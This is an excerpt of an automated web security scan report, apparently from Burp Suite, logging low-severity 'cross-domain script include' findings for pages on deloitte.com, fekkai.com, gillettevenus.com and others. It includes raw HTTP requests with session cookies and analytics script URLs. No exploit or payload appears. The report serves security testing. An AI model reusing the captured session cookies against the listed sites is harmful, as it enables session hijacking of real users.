Path:	/view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure.quantserve.com/quant.js
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/Industries/Telecom-Telecommunications-Technology/a1a6da8d60fd4210VgnVCM200000bb42f00aRCRD.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?&c=&d=0&sw=0&l=-1&pi=1&q=broadband&st=&sl=&s=0&ct=0&et=0&ec=1&m=0&ps=0&type=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.12.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=48; SC_LINKS=us%3Asearch%5E%5EThe%20Broadband%20Stimulus%20Program%3A%20Are%20You%20Prepared%20to%20Explore%20Untapped%20Opportunities%3F%5E%5Eus%3Asearch%20%7C%20The%20Broadband%20Stimulus%20Program%3A%20Are%20You%20Prepared%20to%20Explore%20Untapped%20Opportunities%3F%5E%5E; s_nr=1315345965774-Repeat; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FIndustries%25252FTelecom-Telecommunications-Technology%25252Fa1a6da8d60_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

20.98. http://www.deloitte.com/view/en_US/us/Industries/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/Industries/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure.quantserve.com/quant.js
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/Industries/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=Dbriefs&searchKeywordsFieldDefault=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.2.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; s_ppv=64; SC_LINKS=us%3Asearch%5E%5EIndustries%5E%5Eus%3Asearch%20%7C%20Industries%5E%5E; s_nr=1315345940094-Repeat; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FIndustries%25252Findex.htm_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

20.99. http://www.deloitte.com/view/en_US/us/Insights/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/Insights/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure.quantserve.com/quant.js
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/Insights/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/Industries/index.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; s_vnum=1747342618651%26vn%3D2; JSESSIONID=WGW1TmPf5K1hhvSxmVygzvtch6pn6HsRCtV116TYKr7FcvQTJkvN!-755750050; SITESERVER=ID=0120f21d112bdebcef542549eb84e28a; __utma=55230644.1519156675.1315342619.1315342619.1315345938.2; __utmb=55230644.4.10.1315345938; __utmc=55230644; __utmz=55230644.1315345938.2.2.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=89; SC_LINKS=us%3Aind%5E%5EInsights%5E%5Eus%3Aind%20%7C%20Insights%5E%5E; s_nr=1315345942694-Repeat; s_invisit=true; s_ppg=us%3Aind; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Aind%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FInsights%25252Findex.htm_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

20.100. http://www.deloitte.com/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure.quantserve.com/quant.js
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/Services/additional-services/talent-human-capital-hr/Talent-Library/558d34d8a3a2f210VgnVCM3000001c56f00aRCRD.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.deloitte.com/view/en_US/us/search/index.htm?searchKeywordsField=Dbriefs&searchKeywordsFieldDefault=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-928200600-1315342618637; s_vi=[CS]v1|27332165051D18B6-4000013520016CC4[CE]; BIGipServerwww64.deloitte.com=50851850.36895.0000; JSESSIONID=TXZLTmHhpV39Bfbyvx40TblHPS1M1Jn7hpPL9l4NkhxHQzhRSMmw!-755750050; __utma=55230644.1519156675.1315342619.1315342619.1315342619.1; __utmc=55230644; __utmz=55230644.1315342619.1.1.utmcsr=oracle.com|utmccn=(referral)|utmcmd=referral|utmcct=/openworld/tools/mobile/index.html; s_cc=true; s_ppv=56; SC_LINKS=us%3Asearch%5E%5ETalent%5E%5Eus%3Asearch%20%7C%20Talent%5E%5E; s_nr=1315345935038-Repeat; s_vnum=1747342618651%26vn%3D2; s_invisit=true; s_ppg=us%3Asearch; s_sq=deloittecomnewplatformprod%3D%2526pid%253Dus%25253Asearch%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.deloitte.com%25252Fview%25252Fen_US%25252Fus%25252FServices%25252Fadditional-services%25252Ftalent-human-capital-hr%25252FTalent_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

20.101. http://www.deloitte.com/view/en_US/us/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure.quantserve.com/quant.js
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

GET /view/en_US/us/index.htm HTTP/1.1
Host: www.deloitte.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/tools/mobile/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww64.deloitte.com=17297418.36895.0000

Response

20.102. http://www.deloitte.com/view/en_US/us/search/index.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.deloitte.com
Path:	/view/en_US/us/search/index.htm

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure.quantserve.com/quant.js
https://ips-invite.iperceptions.com/webValidator.aspx?sdfc=225de72b-25001-dc122be4-e6ff-4f0b-866a-51f79b5e757f&lID=1&loc=4Q-WEB2&cD=90&rF=False&iType=1&domainname=0

Request

Response

20.103. http://www.dove.us/Products/Hair/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dove.us
Path:	/Products/Hair/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

GET /Products/Hair/ HTTP/1.1
Host: www.dove.us
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Direct+Beauty+Product
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

20.104. http://www.facebook.com/plugins/activity.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

Response

20.105. http://www.fekkai.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://action.mathtag.com/cnt?id=10384
http://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

20.106. http://www.fekkai.com/categories/conditioners/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/categories/conditioners/

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /categories/conditioners/ HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/style/inspiration/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.331215175.1315345611.1315345611.1315345611.1; __utmb=243632410.2.10.1315345611; __utmc=243632410; __utmz=243632410.1315345611.1.1.utmcsr=fekkai.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __unam=9c154fe-13240b5494c-934a40f-1

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:57 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 35824
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.107. http://www.fekkai.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/favicon.ico

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /favicon.ico HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.732372977.1315345538.1315345538.1315345538.1; __utmb=243632410.1.10.1315345538; __utmc=243632410; __utmz=243632410.1315345538.1.1.utmgclid=COTMo_SIiasCFQ6AgwodqEol4A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:43 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 9627
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.108. http://www.fekkai.com/images/world_of_fekkai_box.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/images/world_of_fekkai_box.jpg

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /images/world_of_fekkai_box.jpg HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/style/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.331215175.1315345611.1315345611.1315345611.1; __utmb=243632410.1.10.1315345611; __utmc=243632410; __utmz=243632410.1315345611.1.1.utmcsr=fekkai.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:46:51 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 9627
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.109. http://www.fekkai.com/style/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/style/

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /style/ HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/?gclid=COTMo_SIiasCFQ6AgwodqEol4A
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=7989285.771822656.1315345608.1315345608.1315345608.1; __utmb=7989285.1.10.1315345608; __utmc=7989285; __utmz=7989285.1315345608.1.1.utmgclid=COTMo_SIiasCFQ6AgwodqEol4A|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:50 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 23364
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.110. http://www.fekkai.com/style/inspiration/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.fekkai.com
Path:	/style/inspiration/

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.revsci.net/gateway/gw.js?csid=F09828
http://w.sharethis.com/button/sharethis.js

Request

GET /style/inspiration/ HTTP/1.1
Host: www.fekkai.com
Proxy-Connection: keep-alive
Referer: http://www.fekkai.com/style/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fekkai_flash_intro_cookie=True; __utma=243632410.331215175.1315345611.1315345611.1315345611.1; __utmb=243632410.1.10.1315345611; __utmc=243632410; __utmz=243632410.1315345611.1.1.utmcsr=fekkai.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:54 GMT
Server: Apache
Vary: User-Agent,Accept-Encoding
Content-Length: 14593
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
</script>

<script src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...
<div class="shareThis">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=ffdcf23c-1079-4fa0-ad15-79625b75a6ac&type=website&post_services=facebook%2Ctwitter%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine%2Cxanga&tabs=web,post"></script>
...[SNIP]...

20.111. http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/buy_it_now/product_links.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://content.channelintelligence.com/scripts/cii_embeddedfunctions.asp
http://content.channelintelligence.com/scripts/ykb_PopupWindow.js
http://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

20.112. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp?utm_source=google&utm_medium=cpc&utm_term=beauty%20product&utm_campaign=Gillette.Venus_Search_Category+Interest_03.2010|Bath+%26+Beauty&utm_content=sgaAjGa2X|pcrid|6694000949
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: preferredLocale=en_US; JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:32 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Fri, 04 Mar 2011 11:05:51 GMT
ETag: "29856d-4ff-49da62105c1c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.113. http://www.gillettevenus.com/en_US/images/go_roll.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/images/go_roll.png

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

GET /en_US/images/go_roll.png HTTP/1.1
Host: www.gillettevenus.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/razor_finder/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=82AE08060FF783B0B7073A67819E2C23.el61; IPE_S_7929=7929; __utma=193945275.1261590129.1315345534.1315345534.1315345534.1; __utmb=193945275.3.9.1315345534; __utmc=193945275; __utmz=193945275.1315345534.1.1.utmcsr=google|utmccn=Gillette.Venus_Search_Category%20Interest_03.2010|Bath%20&%20Beauty|utmcmd=cpc|utmctr=beauty%20product|utmcct=sgaAjGa2X|pcrid|6694000949; bvgacefRatingsAndReviews=true; preferredLocale=en_US; __utmx=193945275.; __utmxx=193945275.; IPE_S_7929=7929

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:46:25 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.7a DAV/2 PHP/5.1.6
Last-Modified: Fri, 04 Mar 2011 11:05:51 GMT
ETag: "29856d-4ff-49da62105c1c0"
Accept-Ranges: bytes
Connection: close
Content-Type: text/html
Content-Length: 1446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.114. http://www.gillettevenus.com/en_US/products/refillables/embrace/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/products/refillables/embrace/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2
http://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:37 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:37 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 89549

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...


<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.115. http://www.gillettevenus.com/en_US/products/refillables/embrace_purple/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/products/refillables/embrace_purple/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2
http://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

20.116. http://www.gillettevenus.com/en_US/razor_finder/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/razor_finder/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2
http://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:46:24 GMT
Set-Cookie: preferredLocale=en_US; Expires=Sun, 04-Sep-2016 16:46:24 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Content-Length: 12747

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>

...[SNIP]...


<script src="http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2" type="text/javascript" defer="defer" ></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=F09828"></script>
...[SNIP]...

20.117. http://www.gillettevenus.com/en_US/search/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/search/index.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

http://4qinvite.4q.iperceptions.com/1.aspx?sdfc=5d51d3d2-6966-5953a36f-b8ea-4cdb-ae01-f6ff6bdd8cea&lID=1&loc=4q-web2
http://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

20.118. http://www.gillettevenus.com/global/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/global/blank.html

Issue detail

The response dynamically includes the following script from another domain:

http://js.revsci.net/gateway/gw.js?csid=F09828

Request

Response

20.119. http://www.harbottle.com/hnl/pages/article_view_hnl/1689.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
